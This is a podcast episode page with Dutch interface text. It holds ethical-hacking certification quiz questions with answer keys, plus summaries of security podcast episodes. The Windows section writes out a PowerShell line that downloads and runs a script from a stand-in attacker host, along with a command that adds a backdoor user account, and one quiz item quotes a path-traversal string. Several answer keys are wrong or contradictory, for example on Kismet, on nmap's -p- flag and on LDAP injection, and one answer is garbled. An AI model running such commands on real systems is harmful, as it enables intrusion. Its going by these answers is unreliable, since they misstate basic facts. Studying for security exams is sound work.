Afleveringen
-
Part 9: Malware Threats and Analysis (15 Questions)
1. Which type of malware disguises itself as legitimate software to deceive users?
• A) Ransomware
• B) Spyware
• C) Trojan Horse
• D) Worm
Answer: C) Trojan Horse
2. What malware self-replicates without user intervention to spread across networks?
• A) Virus
• B) Worm
• C) Rootkit
• D) Spyware
Answer: B) Worm
3. Which malware encrypts a victim’s data and demands payment for decryption?
• A) Adware
• B) Ransomware
• C) Keylogger
• D) Spyware
Answer: B) Ransomware
4. What type of malware records a victim’s keystrokes to steal sensitive information?
• A) Adware
• B) Keylogger
• C) Rootkit
• D) Botnet
Answer: B) Keylogger
5. Which malware resides in a system’s kernel or firmware to maintain persistent access?
• A) Rootkit
• B) Worm
• C) Adware
• D) Trojan
Answer: A) Rootkit
6. Which malware exploits the Master Boot Record (MBR) to execute malicious code before the operating system loads?
• A) Fileless Malware
• B) Bootkit
• C) Worm
• D) Logic Bomb
Answer: B) Bootkit
7. Which type of malware embeds itself directly into system memory without creating permanent files?
• A) Rootkit
• B) Spyware
• C) Fileless Malware
• D) Ransomware
Answer: C) Fileless Malware
8. Which attack manipulates legitimate software to execute malicious code during runtime?
• A) DLL Injection
• B) Polymorphic Malware
• C) Ransomware
• D) Worm
Answer: A) DLL Injection
9. What technique allows malware to modify its code signature to evade detection?
• A) Obfuscation
• B) Polymorphism
• C) Heuristics
• D) Backdoor
Answer: B) Polymorphism
10. Which malware type connects infected devices to a central command-and-control (C2) server?
• A) Spyware
• B) Botnet
• C) Keylogger
• D) Adware
Answer: B) Botnet
11. What malware triggers malicious actions when predefined conditions are met?
• A) Rootkit
• B) Logic Bomb
• C) Worm
• D) Adware
Answer: B) Logic Bomb
12. Which of the following malware types is designed to generate unwanted advertisements?
• A) Spyware
• B) Ransomware
• C) Adware
• D) Trojan
Answer: C) Adware
13. What malware technique leverages PowerShell or WMI for stealth attacks without dropping executable files?
• A) Fileless Malware
• B) Rootkit
• C) Ransomware
• D) Botnet
Answer: A) Fileless Malware
14. Which attack method plants malicious code inside legitimate application updates?
• A) Supply Chain Attack
• B) Side-Channel Attack
• C) Zero-Day Attack
• D) Credential Stuffing
Answer: A) Supply Chain Attack
15. Which malware type encrypts data and demands ransom while threatening to leak sensitive information if payment isn’t made?
• A) Ransomware
• B) Scareware
• C) Cryptojacking
• D) Doxware
Answer: D) Doxware
-
Part 8: Web Application Attacks (15 Questions)
⸻
Which attack exploits unsanitized user input to execute malicious SQL commands?
• A) Cross-Site Scripting (XSS)
• B) SQL Injection (SQLi)
• C) Directory Traversal
• D) Session Hijacking
Answer: B) SQL Injection (SQLi)
Which web attack aims to execute malicious scripts in a victim’s browser via trusted websites?
• A) Cross-Site Scripting (XSS)
• B) Cross-Site Request Forgery (CSRF)
• C) Broken Authentication
• D) IDOR Attack
Answer: A) Cross-Site Scripting (XSS)
What is the primary goal of a Cross-Site Request Forgery (CSRF) attack?
• A) To trick the victim into executing unintended actions on a trusted site
• B) To capture session cookies
• C) To escalate user privileges
• D) To perform remote code execution
Answer: A) To trick the victim into executing unintended actions on a trusted site
Which HTTP method is most commonly exploited in file upload vulnerabilities?
• A) GET
• B) POST
• C) PUT
• D) DELETE
Answer: C) PUT
An attacker manipulates URL parameters to gain unauthorized access to resources. What attack is this?
• A) IDOR Attack
• B) CSRF Attack
• C) XSS Attack
• D) SQL Injection
Answer: A) IDOR Attack
What security vulnerability allows attackers to bypass authentication mechanisms via URL manipulation?
• A) Directory Traversal
• B) Command Injection
• C) Path Manipulation
• D) Broken Access Control
Answer: D) Broken Access Control
Which attack relies on injecting malicious commands directly into a vulnerable web application’s operating system?
• A) SQL Injection
• B) Command Injection
• C) Remote File Inclusion (RFI)
• D) Cross-Site Scripting (XSS)
Answer: B) Command Injection
Which web attack technique manipulates input fields to bypass client-side validation and inject malicious payloads?
• A) Form Injection
• B) SQL Injection
• C) Buffer Overflow
• D) LDAP Injection
Answer: D) LDAP Injection
What security header can help mitigate Cross-Site Scripting (XSS) attacks?
• A) X-Content-Type-Options
• B) Strict-Transport-Security
• C) Content-Security-Policy (CSP)
• D) Cache-Control
Answer: C) Content-Security-Policy (CSP)
Which web attack exploits weak session management by stealing or predicting session tokens?
• A) Clickjacking
• B) Cookie Poisoning
• C) Session Hijacking
• D) IDOR Attack
Answer: C) Session Hijacking
What is the primary goal of a Clickjacking attack?
• A) To inject malicious code into web forms
• B) To trick users into clicking invisible elements
• C) To modify cookie values
• D) To manipulate URL parameters
Answer: B) To trick users into clicking invisible elements
An attacker uses ../../etc/passwd in a URL to gain unauthorized access to system files. What attack is this?
• A) SQL Injection
• B) Directory Traversal
• C) Remote File Inclusion (RFI)
• D) Path Manipulation
Answer: B) Directory Traversal
Which OWASP Top 10 vulnerability relates to failing to properly validate uploaded files?
• A) Injection
• B) Security Misconfiguration
• C) Insecure Deserialization
• D) Unrestricted File Upload
Answer: D) Unrestricted File Upload
What type of attack involves including malicious scripts in web pages that execute on other users’ browsers?
• A) DOM-based XSS
• B) Stored XSS
• C) Reflected XSS
• D) Blind XSS
Answer: B) Stored XSS
Which tool is widely used for discovering web application vulnerabilities through automated scanning?
• A) Hydra
• B) Nikto
• C) John the Ripper
• D) Metasploit
Answer: B) Niktoissues.
-
Zijn er afleveringen die ontbreken?
-
Part 7: Wireless Attacks (15 Questions)
1. Which wireless security protocol is considered the weakest and easiest to crack?
• A) WPA3
• B) WPA2
• C) WEP
• D) 802.1X
Answer: C) WEP
2. What attack captures wireless network packets to exploit encryption weaknesses?
• A) Rogue AP Attack
• B) Evil Twin Attack
• C) Packet Sniffing
• D) IV Attack
Answer: D) IV Attack
3. Which tool is commonly used to perform packet capturing on wireless networks?
• A) Metasploit
• B) Wireshark
• C) John the Ripper
• D) Nessus
Answer: B) Wireshark
4. An attacker creates a fake access point (AP) with the same SSID as a legitimate network. What type of attack is this?
• A) War driving
• B) Evil Twin Attack
• C) Rogue AP Attack
• D) Deauthentication Attack
Answer: B) Evil Twin Attack
5. Which of the following tools is commonly used to perform a deauthentication attack?
• A) Reaver
• B) Aircrack-ng
• C) Kismet
• D) NetStumbler
Answer: B) Aircrack-ng
6. What is the primary goal of a deauthentication attack?
• A) To intercept encrypted passwords
• B) To force clients off the network for denial of service
• C) To scan for open ports on a router
• D) To crack WPS PINs
Answer: B) To force clients off the network for denial of service
7. What is the primary risk of using public Wi-Fi networks?
• A) High latency
• B) IP address conflicts
• C) Packet interception and man-in-the-middle attacks
• D) Limited bandwidth
Answer: C) Packet interception and man-in-the-middle attacks
8. Which wireless security protocol offers the strongest encryption as of today?
• A) WPA3
• B) WPA2
• C) WEP
• D) TKIP
Answer: A) WPA3
9. Which wireless attack targets devices with WPS (Wi-Fi Protected Setup) enabled?
• A) IV Attack
• B) War driving
• C) Reaver Attack
• D) MAC Spoofing
Answer: C) Reaver Attack
10. What is the purpose of MAC address filtering in wireless networks?
• A) To encrypt wireless traffic
• B) To prevent unauthorized devices from connecting
• C) To improve bandwidth management
• D) To detect packet collisions
Answer: B) To prevent unauthorized devices from connecting
11. Which attack involves driving around to locate and exploit unsecured wireless networks?
• A) War driving
• B) War chalking
• C) Rogue AP Attack
• D) MITM Attack
Answer: A) War driving
12. What is the primary risk associated with rogue access points?
• A) Physical damage to network hardware
• B) Overloading network bandwidth
• C) Unauthorized network access and data interception
• D) IP address conflicts
Answer: C) Unauthorized network access and data interception
13. Which type of wireless attack relies on signal jamming to create network interference?
• A) Jamming Attack
• B) Rogue AP Attack
• C) Beacon Flood Attack
• D) Replay Attack
Answer: A) Jamming Attack
14. An attacker uses software to repeatedly broadcast fake SSID beacons, overwhelming available network options. What is this attack called?
• A) Rogue AP Attack
• B) Deauthentication Attack
• C) Beacon Flood Attack
• D) Packet Sniffing
Answer: C) Beacon Flood Attack
15. Which wireless penetration testing tool is known for conducting advanced wireless assessments, including packet sniffing, deauthentication attacks, and WPA cracking?
• A) Hydra
• B) Burp Suite
• C) Kismet
• D) Nmap
Answer: C) Kismet
-
1. What type of attack manipulates query parameters to exploit web databases?
• A) Cross-Site Scripting
• B) Command Injection
• C) SQL Injection
• D) Clickjacking
Answer: C) SQL Injection
Explanation: SQL Injection inserts malicious SQL queries into web forms to manipulate backend databases.
2. Which technique exploits web page scripts to execute malicious code in browsers?
• A) SQL Injection
• B) Cross-Site Scripting (XSS)
• C) Remote File Inclusion
• D) DNS Spoofing
Answer: B) Cross-Site Scripting (XSS)
Explanation: XSS allows attackers to inject malicious scripts into web pages viewed by other users.
3. Which HTTP method is most vulnerable to data exfiltration attacks?
• A) POST
• B) PUT
• C) DELETE
• D) GET
Answer: D) GET
Explanation: Sensitive data passed via GET URLs can be stored in logs or browser history, making it vulnerable.
4. Which tool is most commonly used for web application penetration testing?
• A) Nessus
• B) Burp Suite
• C) Wireshark
• D) Hydra
Answer: B) Burp Suite
Explanation: Burp Suite is a powerful toolkit for mapping, analyzing, and attacking web applications.
5. Which web attack exploits weak session management?
• A) CSRF
• B) Buffer Overflow
• C) Directory Traversal
• D) XXE Injection
Answer: A) CSRF
Explanation: Cross-Site Request Forgery (CSRF) manipulates authenticated users into executing unintended actions.
6. What is a common defense against XSS attacks?
• A) Using CAPTCHA
• B) Encrypting user data
• C) Implementing input validation and output encoding
• D) Blocking UDP traffic
Answer: C) Implementing input validation and output encoding
Explanation: Input validation and output encoding neutralize malicious data to prevent script execution.
7. What is the primary risk of a directory traversal attack?
• A) Gaining administrator privileges
• B) Extracting files outside the web root directory
• C) Manipulating server-side code
• D) Modifying DNS records
Answer: B) Extracting files outside the web root directory
Explanation: Directory traversal exploits path manipulation to access unauthorized files on the server.
8. Which attack manipulates an insecure deserialization vulnerability?
• A) LDAP Injection
• B) XML Injection
• C) Deserialization Attack
• D) Clickjacking
Answer: C) Deserialization Attack
Explanation: Deserialization attacks exploit insecure object deserialization to inject malicious code.
9. Which tool is best for performing brute force attacks on web login pages?
• A) Nikto
• B) John the Ripper
• C) Hydra
• D) Metasploit
Answer: C) Hydra
Explanation: Hydra efficiently performs automated brute-force attacks against web login pages.
10. Which HTTP header can mitigate clickjacking attacks?
• A) X-Frame-Options
• B) Content-Type
• C) Strict-Transport-Security
• D) Cache-Control
Answer: A) X-Frame-Options
Explanation: The X-Frame-Options header prevents web pages from being embedded in iframes, blocking clickjacking attempts.
Bonus: Question: What type of web attack exploits unsanitized user input in database queries?
• A) Cross-Site Scripting (XSS)
• B) SQL Injection (SQLi)
• C) Directory Traversal
• D) Clickjacking
Answer: B) SQL Injection (SQLi)
Explanation: SQL Injection occurs when attackers manipulate user input to execute unauthorized SQL commands, often exposing database contents.
-
1. Which of the following is an example of a pretexting attack?
• A) Sending phishing emails with malicious links
• B) Impersonating an IT technician to gain system access
• C) Deploying malware through USB drives
• D) Exploiting unpatched software vulnerabilities
Answer: B) Impersonating an IT technician to gain system access
2. Which social engineering tactic involves enticing users to plug in infected devices like USB drives?
• A) Shoulder surfing
• B) Tailgating
• C) Baiting
• D) Quid pro quo
Answer: C) Baiting
3. An attacker calls a company’s help desk claiming to be the CFO, requesting urgent access to their email account. Which technique is being used?
• A) Vishing
• B) Pharming
• C) Phishing
• D) Impersonation
Answer: A) Vishing
4. Which social engineering method manipulates victims into revealing sensitive information by posing as a trusted website?
• A) Phishing
• B) Smishing
• C) Eavesdropping
• D) Tailgating
Answer: A) Phishing
5. An attacker follows an employee through a secure door by pretending to be on a phone call and avoiding eye contact. Which technique is this?
• A) Baiting
• B) Shoulder surfing
• C) Tailgating
• D) Dumpster diving
Answer: C) Tailgating
6. Which social engineering tactic involves sending fake SMS messages to manipulate users into revealing information?
• A) Pharming
• B) Smishing
• C) Vishing
• D) Spear phishing
Answer: B) Smishing
7. What is the primary goal of a spear phishing attack?
• A) Disrupt network connectivity
• B) Target a broad group of users
• C) Deceive specific individuals for sensitive data
• D) Infect systems with ransomware
Answer: C) Deceive specific individuals for sensitive data
8. Which method involves attackers searching through discarded documents for sensitive information?
• A) Phishing
• B) Dumpster diving
• C) Shoulder surfing
• D) Spoofing
Answer: B) Dumpster diving
9. An attacker sends a message claiming the victim’s account will be locked unless they provide login credentials. Which attack type is this?
• A) Social engineering
• B) Pharming
• C) Smishing
• D) Phishing
Answer: D) Phishing
10. Which of the following describes a “quid pro quo” attack?
• A) Offering free software in exchange for user credentials
• B) Demanding a ransom for stolen data
• C) Infecting websites to steal session cookies
• D) Leveraging unpatched system vulnerabilities
Answer: A) Offering free software in exchange for user credentials
11. Which of the following is a common goal of impersonation attacks?
• A) To infect the system with malware
• B) To bypass antivirus detection
• C) To gain trust and extract information
• D) To perform denial-of-service attacks
Answer: C) To gain trust and extract information
12. Which technique involves secretly observing a user entering their credentials?
• A) Pharming
• B) Eavesdropping
• C) Shoulder surfing
• D) Tailgating
Answer: C) Shoulder surfing
13. What is the primary defense against social engineering attacks?
• A) Strong passwords
• B) Network firewalls
• C) User awareness training
• D) Antivirus software
Answer: C) User awareness training
14. An attacker registers a website named “paypa1.com” to trick users into logging in. Which technique is this?
• A) Pharming
• B) Typosquatting
• C) Vishing
• D) Pretexting
Answer: B) Typosquatting
15. What is the primary objective of a “watering hole attack”?
• A) To exploit social media vulnerabilities
• B) To infect websites frequently visited by the target
• C) To intercept email communications
• D) To compromise VPN connections
Answer: B) To infect websites frequently visited by the target
-
Part 4: Windows System Hacking Techniques and Tools (15 Questions)
1. The most common technique attackers use to escalate privileges on a Windows system is the Pass-the-Hash attack. This exploit leverages Windows’ authentication mechanisms by using hashed credentials instead of plaintext passwords, allowing attackers to impersonate users without knowing the original password.
2. The Windows tool tasklist allows you to manage system processes, services, and performance monitoring from a command line. It displays all running processes and their Process IDs (PIDs), aiding in identifying suspicious activities.
3. EternalBlue is a tool commonly used for exploiting the SMB protocol on Windows systems. It targets Windows systems vulnerable to CVE-2017-0144, enabling remote code execution.
4. The Windows command net user is used to add a new user account. It can create and modify user accounts, for example: net user hacker P@ssw0rd /add.
5. Metasploit is widely used for creating payloads to exploit Windows vulnerabilities. It is a powerful platform for developing, testing, and executing exploits against Windows targets.
6. Regedit is the Windows utility used to modify the system registry. It is commonly targeted by attackers to establish persistence or modify system settings.
7. The PowerShell command Invoke-WebRequest can download and execute a malicious script directly from memory. It fetches remote payloads: Invoke-WebRequest -Uri “http://attacker.com/malware.ps1” | Invoke-Expression.
8. DLL injection allows attackers to hide malicious code inside legitimate Windows processes like explorer.exe. It involves injecting malicious code into trusted Windows processes, bypassing security tools.
9. Cain & Abel is the best tool for performing password dumping from Windows systems. It is a powerful tool for recovering Windows passwords using techniques like sniffing, dictionary attacks, and password dumping.
10. The SAM file in Windows stores hashed user passwords for local accounts. Attackers often target this file to extract password hashes.
11. John the Ripper is a tool designed to crack NTLM password hashes from Windows systems. It efficiently cracks NTLM, LM, and other hash types for password recovery.
12. PsExec in a Windows environment serves the purpose of remotely executing processes on Windows systems. Part of the Sysinternals Suite, it allows administrators and attackers to remotely execute commands on Windows machines.
13. The PowerShell command Get-Process can list all running processes on a Windows machine. It displays detailed information about active processes, including their CPU and memory usage.
14. Cuckoo Sandbox is the Windows tool designed for analyzing suspicious files by observing their behavior in a sandboxed environment. It is an open-source platform for analyzing malicious files, detecting potential threats in a controlled environment.
15. DLL hijacking manipulates Windows services to gain persistence. It occurs when an attacker places a malicious DLL in a path Windows trusts, enabling code execution with elevated privileges.
-
Part 3: Network Scanning and Enumeration Techniques (15 Questions)
1. What defines network scanning?
• A) Finding web app vulnerabilities
• B) Mapping a network for active hosts and services
• C) Capturing network packets for analysis
• D) Exploiting open ports on a target
Answer: B) Mapping a network for active hosts and services
Explanation: Network scanning identifies live hosts, services, and vulnerabilities. Tools like Nmap are used.
2. Which tool is best for port scanning?
• A) Wireshark
• B) Nmap
• C) Metasploit
• D) Nessus
Answer: B) Nmap
Explanation: Nmap scans IPs, detects open ports, and identifies services.
3. Which Nmap command performs a SYN scan on 192.168.1.0/24?
• A) nmap -sT 192.168.1.0/24
• B) nmap -sP 192.168.1.0/24
• C) nmap -sV 192.168.1.0/24
• D) nmap -sS 192.168.1.0/24
Answer: D) nmap -sS 192.168.1.0/24
Explanation: The -sS flag performs a SYN scan to detect open ports without a full connection.
4. Which scan type bypasses firewalls and IDS?
• A) TCP Connect Scan
• B) UDP Scan
• C) SYN Scan
• D) ACK Scan
Answer: C) SYN Scan
Explanation: A SYN scan sends a SYN packet but doesn’t complete the handshake, making it stealthier.
5. Which Nmap flag identifies a target’s OS?
• A) -O
• B) -sV
• C) -Pn
• D) -A
Answer: A) -O
Explanation: The -O flag enables OS detection by analyzing packet responses.
6. Which protocol is scanned during UDP scans?
• A) ICMP
• B) HTTP
• C) DNS
• D) SMB
Answer: C) DNS
Explanation: DNS uses UDP for queries, making it a key target in UDP scans.
7. Which Nmap command scans all open ports on a target IP using the default 1000 port range?
• A) nmap -p- [IP]
• B) nmap -p 1-65535 [IP]
• C) nmap -sU [IP]
• D) nmap -T4 [IP]
Answer: A) nmap -p- [IP]
Explanation: The -p- flag scans all 65,535 ports for comprehensive coverage.
8. What scan type sends FIN packets to closed ports?
• A) Xmas Scan
• B) FIN Scan
• C) NULL Scan
• D) ACK Scan
Answer: B) FIN Scan
Explanation: A FIN scan sends a TCP packet with only the FIN flag set. Closed ports typically respond with a RST packet.
9. Which enumeration technique queries a DNS server for subdomains and records?
• A) Zone transfer
• B) Footprinting
• C) DNS poisoning
• D) ARP spoofing
Answer: A) Zone transfer
Explanation: A DNS zone transfer retrieves records like A, MX, and CNAME, revealing insights about the network structure.
10. Which tool enumerates NetBIOS shares and services?
• A) Netcat
• B) Responder
• C) Nbtscan
• D) SQLmap
Answer: C) Nbtscan
Explanation: Nbtscan scans and enumerates NetBIOS services, revealing active systems and shared resources.
11. Which protocol is exploited during SMB enumeration?
• A) ICMP
• B) HTTP
• C) FTP
• D) SMBv1
Answer: D) SMBv1
Explanation: SMBv1 is vulnerable to attacks like EternalBlue, making it a common enumeration target.
12. Which Nmap command enables verbose output?
• A) nmap -v
• B) nmap -A
• C) nmap -sP
• D) nmap -vv
Answer: D) nmap -vv
Explanation: The -vv flag increases verbosity, providing real-time updates and detailed insights during scanning.
13. Which tool is best for brute-force enumeration of usernames?
• A) Hydra
• B) John the Ripper
• C) sqlmap
• D) Hashcat
Answer: A) Hydra
Explanation: Hydra is a login cracker used to brute-force services like SSH, FTP, and SMB to enumerate valid usernames.
⸻
14. Which tool is designed for SNMP enumeration?
• A) SNMPwalk
• B) Aircrack-ng
• C) John the Ripper
• D) Ettercap
Answer: A) SNMPwalk
Explanation: SNMPwalk enumerates SNMP data from network devices.
15. Which Nmap scan bypasses firewall rules blocking SYN packets?
• A) NULL Scan
• B) Xmas Scan
• C) FIN Scan
• D) ACK Scan
Answer: D) ACK Scan
Explanation: An ACK scan identifies firewall rules by sending TCP packets with the ACK flag set, determining filtered ports.
-
Part 2: Reconnaissance & Footprinting (15 Questions)
1. What is the main goal of the reconnaissance phase in ethical hacking?
• A) Exploiting vulnerabilities
• B) Identifying security controls
• C) Gathering target information
• D) Delivering payloads
Answer: C) Gathering target information
Explanation: Reconnaissance involves collecting details like domains, IPs, employee info, and network architecture.
2. Which is an example of passive reconnaissance?
• A) Nmap port scan
• B) Social media monitoring
• C) Phishing attack
• D) SQL injection
Answer: B) Social media monitoring
Explanation: Passive reconnaissance gathers public info without engaging the target, like WHOIS lookups or Google Dorking.
3. Which tool performs WHOIS lookups?
• A) Maltego
• B) nslookup
• C) WHOIS
• D) Nikto
Answer: C) WHOIS
Explanation: WHOIS reveals domain registration, owner details, and DNS info.
4. Which technique extracts sensitive data via search engines?
• A) Google Dorking
• B) DNS Spoofing
• C) Phishing
• D) ARP Poisoning
Answer: A) Google Dorking
Explanation: Google Dorking uses search operators to locate exposed files and misconfigured servers.
5. Which command performs DNS zone transfers?
• A) nslookup
• B) whois
• C) dig
• D) ping
Answer: C) dig
Explanation: The dig command queries DNS records like A, MX, and TXT for zone information.
6. What reconnaissance technique intercepts wireless communications?
• A) Phishing
• B) Wardriving
• C) Social engineering
• D) Footprinting
Answer: B) Wardriving
Explanation: Wardriving involves driving around to locate unsecured Wi-Fi networks.
7. Which tool gathers email addresses linked to a domain?
• A) TheHarvester
• B) Nikto
• C) Nessus
• D) Hydra
Answer: A) TheHarvester
Explanation: TheHarvester collects emails, domains, and employee info via search engines and public sources.
8. What technique identifies a target’s network range and IP structure?
• A) Banner grabbing
• B) Port scanning
• C) Footprinting
• D) Fingerprinting
Answer: C) Footprinting
Explanation: Footprinting maps IP addresses, DNS info, and system configurations.
9. Which tool maps relationships between organizations, social media, and domains?
• A) Maltego
• B) Metasploit
• C) Nikto
• D) sqlmap
Answer: A) Maltego
Explanation: Maltego visualizes connections across networks and social platforms.
10. Which command identifies a domain’s mail server?
• A) ping
• B) traceroute
• C) nslookup
• D) netcat
Answer: C) nslookup
Explanation: nslookup -type=MX [domain] reveals mail server info.
11. Which method uses impersonation or pretexting to gather information?
• A) Passive reconnaissance
• B) Active reconnaissance
• C) Human reconnaissance
• D) Hybrid reconnaissance
Answer: C) Human reconnaissance
Explanation: Human reconnaissance exploits social engineering tactics to extract data.
12. Which tool maps web application attack surfaces?
• A) Burp Suite
• B) Aircrack-ng
• C) Hashcat
• D) Ettercap
Answer: A) Burp Suite
Explanation: Burp Suite identifies web application vulnerabilities.
13. Which technique targets employees with customized attacks?
• A) Whaling
• B) Footprinting
• C) Spear phishing
• D) Dumpster diving
Answer: C) Spear phishing
Explanation: Spear phishing personalizes attacks using gathered employee details.
14. Which reconnaissance type directly interacts with target systems?
• A) Passive reconnaissance
• B) Active reconnaissance
• C) Hybrid reconnaissance
• D) Dynamic reconnaissance
Answer: B) Active reconnaissance
Explanation: Active reconnaissance involves direct engagement like port scanning.
15. Which technique retrieves sensitive data from discarded items?
• A) Baiting
• B) Dumpster diving
• C) Tailgating
• D) Pharming
Answer: B) Dumpster diving
Explanation: Dumpster diving involves searching trash for useful data.
-
Part 1: Ethical Hacking Fundamentals (10 Questions)
1. What is the main aim of a penetration test?
• A) Network performance issues
• B) Find vulnerabilities before attackers
• C) Enhance software development
• D) Prevent unauthorized access
Answer: B) Find vulnerabilities before attackers
2. Which method uses tools to check systems for known weaknesses?
• A) Fuzzing
• B) Static Analysis
• C) Vulnerability Scanning
• D) Social Engineering
Answer: C) Vulnerability Scanning
3. What distinguishes a black-box from a white-box penetration test?
• A) White-box testers have no knowledge of the system
• B) Black-box testers mimic insiders
• C) Black-box testers have no prior system knowledge
• D) White-box testers focus on social engineering
Answer: C) Black-box testers have no prior system knowledge
4. Which attack vector targets the human element in security?
• A) Phishing
• B) DNS Spoofing
• C) ARP Poisoning
• D) MITM Attack
Answer: A) Phishing
5. Which security framework provides key controls for enterprise networks?
• A) ISO 27001
• B) OWASP Top 10
• C) MITRE ATT&CK
• D) NIST 800-53
Answer: D) NIST 800-53
6. What type of hacker is driven by social, political, or ideological causes?
• A) Black Hat
• B) White Hat
• C) Gray Hat
• D) Hacktivist
Answer: D) Hacktivist
7. What is the main goal of a honeypot?
• A) Encrypt network data
• B) Monitor user behavior
• C) Distract attackers and gather intelligence
• D) Protect against SQL Injection
Answer: C) Distract attackers and gather intelligence
8. What is the primary purpose of the OWASP Top 10?
• A) Compliance audit checklist
• B) Encryption algorithm standards
• C) Guideline for identifying web application risks
• D) Tool for zero-day vulnerabilities tracking
Answer: C) Guideline for identifying web application risks
9. Which phase of ethical hacking identifies active IP addresses in the target network?
• A) Reconnaissance
• B) Scanning
• C) Gaining Access
• D) Covering Tracks
Answer: B) Scanning
10. What legal agreement defines an ethical hacker’s authorized actions during testing?
• A) Service Level Agreement (SLA)
• B) Non-Disclosure Agreement (NDA)
• C) Rules of Engagement (RoE)
• D) End-User License Agreement (EULA)
Answer: C) Rules of Engagement (RoE)
Bonus: What is a passive reconnaissance method?
• A) Nmap Scan
• B) Social Engineering
• C) WHOIS Lookup
• D) SQL Injection
Answer: C) WHOIS Lookup
-
Edward Henriquez's podcast episode, "Decoded: Web Application Hacking," uses "The Web Application Hacker’s Handbook" as a foundation to explore prevalent web application attacks. The episode introduces fundamental concepts and then examines specific vulnerabilities, such as SQL injection, cross-site scripting (XSS), cross-site request forgery (CSRF), and command injection, explaining how these attacks are executed and their potential impact. For each attack type, Henriquez provides illustrative scenarios and outlines key defense strategies. The podcast concludes by emphasizing the continuous nature of web security and the importance of proactive measures like secure development practices and penetration testing.
-
The Decoded podcast episode, hosted by Edward Henriquez, explores real-world hacking tactics drawn from Peter Kim's Hacker Playbook series, moving beyond fictional portrayals. It details the stages of an attack, starting with reconnaissance using OSINT and tools like Shodan and Nmap to gather information. The episode then examines exploitation techniques that target vulnerabilities with tools such as Burp Suite and Mimikatz. Further discussion covers pivoting and escalation within a network using methods like pass-the-hash and PowerShell Empire. Finally, the podcast addresses how attackers cover their tracks and provides key defensive strategies like penetration testing and employee training to mitigate these threats.
-
The podcast episode "Decoded – Unmasking the CEH" provides a comprehensive guide to the Certified Ethical Hacker (CEH) certification. Hosted by Edward Henriquez, the episode outlines what the CEH is, its significance in cybersecurity, and the career opportunities it can unlock. It thoroughly breaks down the 20 domains covered in the CEH exam, including topics like reconnaissance, network scanning, system hacking, and web application attacks. The podcast also offers advice on how to effectively prepare for the exam, suggesting study materials, hands-on practice, and the use of specific tools. Furthermore, it discusses the value of the CEH certification in comparison to other cybersecurity credentials. Ultimately, the episode aims to equip listeners with a clear understanding of the CEH and the steps needed to pursue it.
-
Decoded: The Open-Source Arsenal – Deep Dive into DFIR Tools is a podcast episode hosted by Edward Henriquez that explores a variety of open-source tools critical for digital forensics and incident response (DFIR). The episode examines tools used in disk and memory forensics, such as Autopsy, The Sleuth Kit, Volatility, and Rekall, for analyzing compromised systems and memory dumps. It further discusses network forensics with Wireshark, Zeek, and Suricata for traffic analysis and threat detection. Additionally, the episode covers log and event analysis using the ELK Stack and Graylog, as well as malware analysis with YARA, Ghidra, and Radare2. Finally, it touches upon incident response and threat hunting tools like Velociraptor, GRR Rapid Response, and Osquery, and concludes with cloud forensics tools for AWS and GCP, highlighting their importance in uncovering cyber threats.
-
This podcast episode of "Decoded" explores the importance of Unix in cybersecurity. It traces Unix's origins and its influence on modern operating systems and security practices. The episode highlights essential Unix commands for security professionals and explains effective patching and update strategies. It also shows how to use Ansible for automating Unix security tasks such as enforcing policies, deploying intrusion detection tools, and managing user privileges. Ultimately, the podcast underscores why proficiency in Unix is critical for anyone serious about a career in cybersecurity.
-
Edward Henriquez hosts the "Decoded Podcast". The YouTube video by "UnixGuy | Cyber Security" outlines a comprehensive six-month plan for individuals seeking entry-level cybersecurity positions without prior experience or degrees. It emphasizes practical, hands-on skills, starting with the Google Cybersecurity Certificate. The plan includes resume building, focusing on relevant experience, immediately applying for jobs to gain confidence, becoming a cybersecurity generalist before specializing, participating in virtual internships, and engaging in intermediate-level training.
-
PurpleLab is an open-source cybersecurity lab designed to help security teams detect, analyze, and simulate cyber threats. It provides a sandboxed environment with tools for testing detection rules, generating realistic logs, and executing malware. The lab includes a web interface, a Windows 10 virtual machine with forensic tools, and integration with the ELK stack for log analysis. Administrators can configure LDAP settings and API keys, as well as set up integration with Splunk. PurpleLab requires a clean installation of Ubuntu Server 22.04 and offers various pages for monitoring, hunting, simulating attacks, and managing system health.
-
This podcast episode of Decoded, hosted by Edward Henriquez, addresses the ever-present threat of password cracking. It explores three common methods used by hackers: brute force attacks, dictionary attacks, and rainbow table attacks. For each technique, Henriquez provides real-world examples of successful breaches, highlighting the potential damage. Most importantly, the podcast offers actionable advice on how individuals and organizations can strengthen their password security through strategies like using long, complex passwords, enabling multi-factor authentication, and implementing robust password policies. The goal is to empower listeners with the knowledge to defend themselves against these prevalent cyber threats.
-
This curated list highlights top books for mastering Open-Source Intelligence (OSINT). The texts cover diverse aspects, from cybercrime investigation and strategic thinking to human rights documentation and digital privacy. Several books offer practical guidance on OSINT techniques, data analysis, and ethical considerations. Some focus on applying OSINT in specific domains like cybersecurity and corporate due diligence. Others explore the psychological dimensions of social engineering for ethical intelligence gathering. Overall, the collection equips readers with comprehensive knowledge for leveraging publicly available data across various fields.
-
The CrowdStrike 2024 Threat Hunting Report analyzes the evolving cyber threat landscape over the past year. It highlights the rise of stealthy, cross-domain attacks targeting identity, endpoints, and cloud environments. The report emphasizes the increasing use of legitimate tools like RMM software by adversaries for malicious purposes and insider threats exploiting recruitment processes. CrowdStrike's OverWatch team uses threat intelligence, AI, and proactive hunting to detect and disrupt these advanced threats, ultimately strengthening the Falcon platform's defenses. Case studies illustrate real-world examples of adversaries like SCATTERED SPIDER and FAMOUS CHOLLIMA, and detail the tactics used to counter them.
-
This podcast episode discusses using artificial intelligence (AI) to enhance cybersecurity. It focuses on running Large Language Models (LLMs) locally for improved security, pretraining AI models for threat detection and anomaly identification, and building AI-driven proof-of-concept security tools. Specific open-source LLMs like DeepSeek, Tulu-3, and Tongyi are highlighted for their applications in various security tasks. The episode emphasizes the benefits of AI in automating security workflows, improving response times, and reducing alert fatigue. Finally, it promotes building custom AI security tools using readily available technologies like Docker and Fast-LLM.
- Laat meer zien
